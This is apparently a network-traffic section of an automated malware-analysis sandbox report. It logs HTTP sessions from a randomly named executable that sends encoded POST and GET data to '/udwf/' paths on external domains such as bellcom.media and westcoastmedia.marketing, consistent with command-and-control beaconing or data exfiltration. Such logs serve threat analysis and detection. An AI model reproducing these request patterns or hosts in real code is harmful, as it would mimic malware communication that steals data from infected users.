64 58 55 42 52 34 56 4f 43 32 2b 6e 39 34 78 46 44 77 69 44 63 6f 52 4f 56 35 48 66 47 66 6e 69 2b 64 4c 33 33 6e 2b 54 53 46 47 51 31 53 55 44 52 76 72 5a 4d 4e 69 47 67 47 32 79 63 68 6d 50 4f 72 77 43 51 52 6c 74 39 7a 4f 6d 74 67 54 63 51 6a 4b 43 6f 64 39 6d 50 79 6c 43 68 54 74 4c 36 70 69 64 48 70 46 36 35 34 57 59 6e 62 79 6c 53 44 74 76 71 43 6c 2b 44 32 4e 4f 49 35 6c 74 47 38 38 2f 67 2b 56 71 66 70 54 42 2f 43 33 4a 57 5a 54 35 4c 4f 5a 55 4b 62 30 58 42 46 7a 4d 55 73 66 43 7a 63 43 2b 4d 38 39 56 41 59 33 66 49 72 30 66 66 43 31 38 6c 4f 4c 75 4f 6b 6e 62 2f 64 4e 52 38 61 65 50 44 51 37 4e 6d 76 42 76 70 4a 32 43 42 45 34 74 50 70 4a 39 73 6d 68 65 6d 62 52 49 6b 64 35 2f 54 6d 2b 79 42 7a 48 68 78 57 75 44 43 47 7a 2b 71 6c 49 57 6a 79 67 46 58 7a 44 51 7a 30 44 69 2b 32 66 65 30 31 55 49 36 65 6e 6e 55 31 2b 72 39 62 52 79 38 31 61 56 52 6a 7a 37 6f 36 35 76 38 46 6d 32 72 75 2f 54 50 34 2f 76 45 76 51 43 47 52 6a 7a 69 32 62 50 72 6d 4a 61 61 42 39 4d 56 73 61 77 49 6e 55 7a 42 77 32 4e 6c 33 79 51 41 33 4e 61 6b 4b 58 74 69 4b 44 30 62 61 4c 5a 38 65 71 55 64 43 61 38 4b 71 69 70 4b 56 78 6e 4f 55 49 7a 42 39 78 69 36 51 4a 61 75 2b 64 69 52 57 48 4f 54 6a 44 70 44 67 32 50 77 38 45 54 2f 48 75 37 48 46 33 4c 37 2b 6c 49 51 52 78 68 55 4a 50 5a 48 4b 72 42 78 46 49 66 44 4e 64 4c 54 6b 78 37 4f 79 45 6b 4d 67 74 39 36 42 48 43 6a 54 6b 39 30 35 62 49 6a 2b 2b 4e 76 51 54 47 61 68 53 54 4a 2f 49 46 74 6e 4c 6d 4a 76 33 6f 7a 68 71 4c 54 52 46 37 70 74 33 39 53 49 53 79 54 77 4e 37 77 2f 57 35 77 57 62 72 46 6f 79 4e 6a 34 70 39 62 63 38 6b 56 36 30 6c 58 31 62 43 73 50 6e 34 4e 4d 49 30 47 47 4d 63 46 55 4d 44 78 6e 56 32 76 65 66 35 2b 41 6a 67 6a 7a 59 32 32 66 6a 6b 32 41 4c 64 41 71 58 69 78 6e 61 51 57 43 6e 68 68 47 70 69 6c 58 66 68 5a 59 31 39 62 32 59 4a 4e 30 51 53 6b 79 77 74 6a 2f 4a 39 46 41 67 31 6a 75 42 67 75 77 2b 6f 76 4c 39 49 64 78 49 63 57 6a 4d 2b 6c 53 73 61 55 38 79 2f 31 6e 77 69 58 7a 67 51 65 63 54 43 46 41 66 66 56 71 75 48 6b 43 61 49 65 31 2b 44 52 42 32 48 4d 6c 49 37 62 6c 34 35 37 6a 71 62 71 70 31 6a 41 6c 55 56 66 57 62 39 37 71 45 33 4d 47 52 65 46 33 78 30 6b 52 47 43 73 4e 37 7a 4e 4d 47 5a 74 69
                                                                                                                            Data Ascii: G0Yxd2Q=aBEO7CI58E9LNjdyOvtezXM7OEmuBdWB5EWcuxNHDiIxd0WC0Y/xDY8VQo2h/JtxZEEj/hfMdIxF5nbuuaMBkkzz27iXCrQm7G3G8NKs7Kd9+muAL8yBDRoyZkRnJxYa8XySR3plh6b3krk3T0Zv/cJBQ8eezVenRbgdNHHjSWXCwceAuCkvLYf4sBwUhZUKf6RgF0a7EKeqfh9i3VpaV9xyulyGJpwRxDOAh1bvjZzQaXjQqHFZJ05Bh+Lq9sUGPezEXg8emHasArBIGtUES4fZMjTBJ7ZocLK7PrBJ5ap4b6m0uJVDPRVTqEKo/b81KwQrrEHiwSwEoukrygeJNQkPwdllZd0RTEEPro0pXMU/gHRDJ07cGsvJWJ8wJUP72G9fr1pR/3r+25JDogbBPXalWU9D27gkGDTmqGNQzssne2Hs/rRKQ8mkUIxZunehp+ti387IBjEvT2WmlNmt3qoWd3ewExeVV8dXUBR4VOC2+n94xFDwiDcoROV5HfGfni+dL33n+TSFGQ1SUDRvrZMNiGgG2ychmPOrwCQRlt9zOmtgTcQjKCod9mPylChTtL6pidHpF654WYnbylSDtvqCl+D2NOI5ltG88/g+VqfpTB/C3JWZT5LOZUKb0XBFzMUsfCzcC+M89VAY3fIr0ffC18lOLuOknb/dNR8aePDQ7NmvBvpJ2CBE4tPpJ9smhembRIkd5/Tm+yBzHhxWuDCGz+qlIWjygFXzDQz0Di+2fe01UI6ennU1+r9bRy81aVRjz7o65v8Fm2ru/TP4/vEvQCGRjzi2bPrmJaaB9MVsawInUzBw2Nl3yQA3NakKXtiKD0baLZ8eqUdCa8KqipKVxnOUIzB9xi6QJau+diRWHOTjDpDg2Pw8ET/Hu7HF3L7+lIQRxhUJPZHKrBxFIfDNdLTkx7OyEkMgt96BHCjTk905bIj++NvQTGahSTJ/IFtnLmJv3ozhqLTRF7pt39SISyTwN7w/W5wWbrFoyNj4p9bc8kV60lX1bCsPn4NMI0GGMcFUMDxnV2vef5+AjgjzY22fjk2ALdAqXixnaQWCnhhGpilXfhZY19b2YJN0QSkywtj/J9FAg1juBguw+ovL9IdxIcWjM+lSsaU8y/1nwiXzgQecTCFAffVquHkCaIe1+DRB2HMlI7bl457jqbqp1jAlUVfWb97qE3MGReF3x0kRGCsN7zNMGZti
                                                                                                                            Nov 10, 2023 09:31:07.909116983 CET345INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:31:07 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            55192.168.2.104977191.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:31:12.865883112 CET346OUTGET /udwf/?G0Yxd2Q=XDsu41kr/WE9JT9AScR/+1k0JlKiFIG701T/ujNzDh06TiWTrNXnD44RUNnX/KpbWGAw0lPsPrhbwlOTmOIr6R/DwJG4M7kG+w==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:31:13.204938889 CET347INHTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:31:13 GMT
                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                            transfer-encoding: chunked
                                                                                                                            vary: Accept-Encoding
                                                                                                                            x-powered-by: PHP/8.1.17
                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                            pragma: no-cache
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_la4oIoXL1u9nRopmd8UCD1eLSSfRJulQyjea9uKJHVbCCmEd2l0tePfspS9EWL9y+7/aoQHxtA7MGMAlCcT8Uw==
                                                                                                                            last-modified: Fri, 10 Nov 2023 08:31:13 GMT
                                                                                                                            x-cache-miss-from: parking-698fb476bf-mbx66
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 38 34 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6c 61 34 6f 49 6f 58 4c 31 75 39 6e 52 6f 70 6d 64 38 55 43 44 31 65 4c 53 53 66 52 4a 75 6c 51 79 6a 65 61 39 75 4b 4a 48 56 62 43 43 6d 45 64 32 6c 30 74 65 50 66 73 70 53 39 45 57 4c 39 79 2b 37 2f 61 6f 51 48 78 74 41 37 4d 47 4d 41 6c 43 63 54 38 55 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 77 65 73 74 63 6f 61 73 74 6d 65 64 69 61 2e 6d 61 72 6b 65 74 69 6e 67 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 77 65 73 74 63 6f 61 73 74 6d 65 64 69 61 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 73 74 63 6f 61 73 74 6d 65 64 69 61 2e 6d 61 72 6b 65 74 69 6e 67 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99
                                                                                                                            Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_la4oIoXL1u9nRopmd8UCD1eLSSfRJulQyjea9uKJHVbCCmEd2l0tePfspS9EWL9y+7/aoQHxtA7MGMAlCcT8Uw==><head><meta charset="utf-8"><title>westcoastmedia.marketing&nbsp;-&nbsp;westcoastmedia Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="westcoastmedia.marketing is your first and best source for all of the information you
                                                                                                                            Nov 10, 2023 09:31:13.204988003 CET348INData Raw: 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c
                                                                                                                            Data Ascii: re looking for. From general topics to more of what you would expect to find here, westcoastmedia.marketing has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedopar
                                                                                                                            Nov 10, 2023 09:31:13.205024004 CET349INData Raw: 61 69 6e 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2a 64 69 73
                                                                                                                            Data Ascii: ain,nav,section,summary{display:block}audio,canvas,video{display:inline-block;*display:inline;*zoom:1}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-size:100%;-ms-text-size-adjust:100%;-web1062kit-text-size-adj
                                                                                                                            Nov 10, 2023 09:31:13.205060005 CET351INData Raw: 65 3a 62 69 63 75 62 69 63 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 66 6f 72 6d 7b 6d 61 72 67 69 6e 3a 30 7d 66 69 65 6c 64 73 65 74 7b 62 6f
                                                                                                                            Data Ascii: e:bicubic}svg:not(:root){overflow:hidden}figure{margin:0}form{margin:0}fieldset{border:0 none;margin:0;padding:0}legend{border:0;padding:0;white-space:normal;*margin-left:-7px}button,input,select,textarea{font-size:100%;margin:0;vertical-align
                                                                                                                            Nov 10, 2023 09:31:13.205097914 CET352INData Raw: 69 64 74 68 3a 31 34 34 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e
                                                                                                                            Data Ascii: idth:1440px}.nc-container{width:100%;text-align:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888}.content-disclaimer{font-size:10px}.content-disclaimer .sedologo{float:left;padding:0 10px 0 0}.co
                                                                                                                            Nov 10, 2023 09:31:13.205136061 CET354INData Raw: 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 70 2c 23 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 61 30 61 30 61 30 7d
                                                                                                                            Data Ascii: bottom:15px}#container-cookie-message p,#container-cookie-message a{color:#a0a0a0}#container-cookie-message p{margin-left:5%;margin-right:5%}.content-buybox{background:linear-gradient(to bottom, #666666 0%, #010101 100%);border-bottom:1px soli
                                                                                                                            Nov 10, 2023 09:31:13.205173016 CET355INData Raw: 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 30 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 2e 77 65 62
                                                                                                                            Data Ascii: ontent-webarchive div .webarchive-block{padding:7px 0}.content-webarchive div .webarchive-block h3{font-weight:bold}.content-webarchive div .webarchive-block h3 a:link,.content-webarchive div .webarchive-block h3 a:visited{text-decoration:none
                                                                                                                            Nov 10, 2023 09:31:13.205212116 CET356INData Raw: 65 74 5f 6c 69 6d 65 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 20 75 6c 20 6c
                                                                                                                            Data Ascii: et_lime.gif");float:right;padding:0}.content-webarchive div .webarchive-block ul li a:link,.content-webarchive div .webarchive-block ul li a:visited{text-decoration:none}.content-webarchive div .webarchive-block ul li a:active,.content-webarch
                                                                                                                            Nov 10, 2023 09:31:13.205266953 CET357INData Raw: 6e 74 2d 61 64 73 20 75 6c 20 6c 69 20 68 33 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 7d 2e 63 6f 6e 74 65 6e 74 2d 61 64 73 20 75 6c 20 6c 69 20 68 33 20 61 3a 68 6f 76 65 72 2c 2e 63 6f 6e 74 65 6e 74 2d 61 64 73
                                                                                                                            Data Ascii: nt-ads ul li h3 a:visited{color:#9fd801}.content-ads ul li h3 a:hover,.content-ads ul li h3 a:active,.content-ads ul li h3 a:focus{color:#e57921}.content-ads ul li p{color:#c1c1c1}.content-ads ul li p a:link,.content-ads ul li p a:visited{colo
                                                                                                                            Nov 10, 2023 09:31:13.205303907 CET359INData Raw: 41 45 43 0d 0a 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 64 69 76 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 20 75 6c 20 6c 69 20 61 3a 6c 69 6e 6b 2c 2e 63 6f 6e 74 65 6e 74 2d
                                                                                                                            Data Ascii: AECtion:none}.content-webarchive div div.webarchive-block ul li a:link,.content-webarchive div div.webarchive-block ul li a:visited{color:#9fd801}.content-webarchive div div.webarchive-block ul li a:hover,.content-webarchive div div.webarchi
                                                                                                                            Nov 10, 2023 09:31:13.512258053 CET360INData Raw: 2e 63 6f 6e 74 65 6e 74 2d 61 64 73 20 75 6c 20 6c 69 20 64 69 76 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 35 70 78 7d 2e 63 6f 6e 74 65 6e 74 2d 61 64 73 20 75 6c 20 6c 69 20 64 69 76 20 68 33 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70
                                                                                                                            Data Ascii: .content-ads ul li div{padding-left:35px}.content-ads ul li div h3 a{font-size:23px;text-transform:uppercase;font-weight:bold}.content-ads ul li div p{padding:.3em 0 .6em 0;font-size:1.2em}.content-ads ul li div p a{font-size:1em}ul li{word-wr


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            6192.168.2.104972091.195.240.12380C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:02.481271982 CET106OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.bellcom.media
                                                                                                                            Referer: http://www.bellcom.media/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 79 64 76 54 73 32 53 48 37 61 39 53 68 50 62 73 4a 4d 4d 48 39 73 4f 70 39 36 46 37 57 4c 42 74 6f 43 73 30 2b 41 42 36 4b 5a 6f 73 44 64 6b 30 46 36 7a 6a 73 5a 49 51 4f 64 76 2f 33 30 69 38 72 7a 33 34 59 55 57 71 6c 2f 47 4f 30 6c 6a 38 4e 75 42 55 79 62 6c 79 37 72 68 56 45 4f 4a 41 6c 4f 4d 54 51 61 73 67 63 48 75 45 53 6d 4a 2b 78 78 75 6e 78 45 39 50 7a 61 44 4e 73 6c 31 4d 76 4f 6a 75 46 62 68 30 6c 50 61 6b 6b 54 63 79 50 6e 59 35 54 6b 4a 37 65 36 59 71 36 73 33 48 6a 46 52 33 32 78 64 4d 71 39 48 62 51 58 6c 32 47 53 76 35 5a 58 71 4d 37 42 5a 76 62 2b 38 78 33 56 6c 79 36 50 67 3d
                                                                                                                            Data Ascii: G0Yxd2Q=ydvTs2SH7a9ShPbsJMMH9sOp96F7WLBtoCs0+AB6KZosDdk0F6zjsZIQOdv/30i8rz34YUWql/GO0lj8NuBUybly7rhVEOJAlOMTQasgcHuESmJ+xxunxE9PzaDNsl1MvOjuFbh0lPakkTcyPnY5TkJ7e6Yq6s3HjFR32xdMq9HbQXl2GSv5ZXqM7BZvb+8x3Vly6Pg=
                                                                                                                            Nov 10, 2023 09:28:02.789205074 CET107INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:28:02 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            7192.168.2.104972291.195.240.12380C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:05.310724020 CET140OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.bellcom.media
                                                                                                                            Referer: http://www.bellcom.media/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 79 64 76 54 73 32 53 48 37 61 39 53 68 50 62 73 4a 4d 4d 48 39 73 4f 70 39 36 46 37 57 4c 42 74 6f 43 73 30 2b 41 42 36 4b 5a 67 73 43 76 63 30 45 5a 62 6a 76 5a 49 51 50 64 76 2b 33 30 69 62 72 7a 76 38 59 55 61 36 6c 36 43 4f 37 6a 2f 38 4c 63 70 55 6f 4c 6c 79 35 72 68 51 4c 75 49 43 6c 4f 63 58 51 65 77 67 63 48 75 45 53 6c 52 2b 34 44 47 6e 33 45 39 4d 6b 71 44 4a 6f 6c 30 43 76 50 48 55 46 62 73 4a 6c 2b 36 6b 68 44 73 79 41 31 77 35 52 45 4a 31 64 36 5a 31 36 73 72 49 6a 46 4d 4f 32 31 56 79 71 2f 6e 62 54 67 6b 75 43 42 50 41 61 47 6e 56 79 69 4d 6d 51 75 46 57 6a 58 39 4f 76 70 6e 78 4c 73 57 74 4a 6a 2b 46 4b 2b 67 74 5a 55 38 77 49 62 57 61 68 79 53 4a 37 43 6d 67 37 59 68 52 36 32 65 74 72 4b 74 58 73 57 6d 35 6e 2f 5a 53 72 49 68 37 33 69 4b 32 45 71 6d 62 77 4e 42 33 4d 4f 6d 43 32 6e 2f 36 6a 62 51 70 4b 48 71 78 77 46 70 6b 37 4c 69 35 6c 47 45 77 54 75 67 65 41 54 61 38 4c 62 73 70 6f 59 70 6a 47 71 52 6b 2f 66 5a 50 58 76 58 39 6d 62 75 69 48 7a 50 37 4f 6a 39 77 36 55 76 68 35 45 34 6d 51 47 38 72 55 63 68 4d 75 66 53 72 66 48 70 55 55 79 48 54 57 76 72 4e 5a 69 59 55 42 36 31 71 77 72 62 75 63 46 55 4b 45 45 76 61 33 6c 36 34 41 38 6b 36 51 67 54 63 51 32 58 51 74 5a 67 4a 61 65 4e 46 67 47 30 50 34 6d 6b 63 45 64 76 6d 4a 34 2b 6c 59 6a 64 39 76 6c 5a 45 58 2f 54 77 77 77 77 53 50 37 51 73 73 78 72 38 4d 66 34 58 50 76 34 58 2b 59 30 63 6e 7a 36 63 33 74 4f 71 64 6b 4c 67 68 4c 44 70 4a 4e 41 55 64 39 54 32 50 64 52 69 4e 6e 62 47 4a 4d 78 6d 53 51 6c 66 2f 33 4f 41 33 77 53 71 59 77 75 74 6d 56 43 71 37 62 74 74 2f 34 79 7a 53 38 46 6b 38 71 31 4e 78 78 69 49 5a 62 6e 36 6d 58 46 79 55 71 47 36 6f 44 38 38 4c 32 4a 43 72 77 4e 6e 6c 34 34 64 77 6a 66 47 56 7a 36 2b 57 30 2b 5a 46 2f 53 35 49 6d 52 46 4f 4a 52 4b 71 35 6b 34 73 73 41 4d 36 39 31 6d 46 5a 50 2f 52 6c 5a 59 49 72 55 44 31 6d 67 77 75 77 36 45 6b 6c 6f 4b 54 74 32 6b 37 53 79 7a 61 41 39 6e 79 42 39 4a 70 73 55 4a 42 64 6c 67 75 43 79 6f 6f 52 73 46 39 6b 62 38 33 47 56 65 4a 64 70 50 59 68 6b 35 73 57 4d 47 6d 65 45 52 44 62 58 48 54 72 35 71 2b 71 58 45 58 75 4f 6b 46 37 57 45 45 6b 38 6d 79 79 66 42 4e 4f 58 4d 47 64 72 6e 69 37 4e 30 6d 36 46 46 4b 2b 75 34 45 30 63 71 74 4f 49 66 6d 4d 51 58 70 31 43 70 6d 2b 73 6f 57 35 72 77 7a 65 4f 70 73 63 38 49 49 76 68 61 5a 4c 35 47 54 2b 57 72 53 4a 41 63 34 46 51 38 46 30 49 33 61 35 45 51 77 64 79 46 33 57 74 79 61 77 6f 2b 32 4a 71 77 52 74 77 6f 73 74 2f 56 51 35 47 6b 42 71 62 4a 70 6d 69 67 44 6f 32 71 37 48 48 77 42 6e 69 4c 30 73 4e 31 42 54 58 43 75 54 66 64 58 48 35 2f 4e 6d 7a 49 48 4b 72 4e 6d 4d 65 51 73 71 4c 46 52 64 34 4b 5a 36 2f 46 41 71 65 41 33 5a 45 77 50 2b 66 45 4f 70 2b 7a 4f 54 41 41 68 67 2b 4b 53 38 58 59 68 2b 76 66 74 69 68 74 69 48 55 52 42 47 68 51 39 55 63 4c 77 62 37 4c 4b 75 47 36 39 58 38 66 32 63 4a 66 37 64 4a 63 47 37 35 41 2b 35 57 6e 6b 52 66 41 6f 70 41 61 4c 71 38 42 2f 31 62 56 43 4a 6b 37 6c 30 50 49 33 6e 6d 6e 39 50 30 5a 53 68 77 61 56 59 67 39 49 46 53 38 6e 4d 72 4e 6f 72 37 73 53 65 32 67 47 68 51 53 49 51 4b 36 50 73 55 44 30 68 51 36 35 68 43 67 72 4c 62 66 76 4f 58 58 68 33 57 69 6c 55 79 50 48 33 78 68 47 4b 2b 4b 2f 46 59 7a 73 54 57 38 47 45 49 37 73 57 6f 62 67 66 70 7a 53 42 47 72 33 58 4f 4b 63 49 44 75 74 45 6e 63 38 6f 4d 61 78 66 53 74 70 52 54 65 42 61 75 4d 6b 62 46 69 46 49 4f 2b 57 39 33 65 6b 52 56 56 6c 52 7a 52 48 6e 58 67 57 39 4e 58 68 45 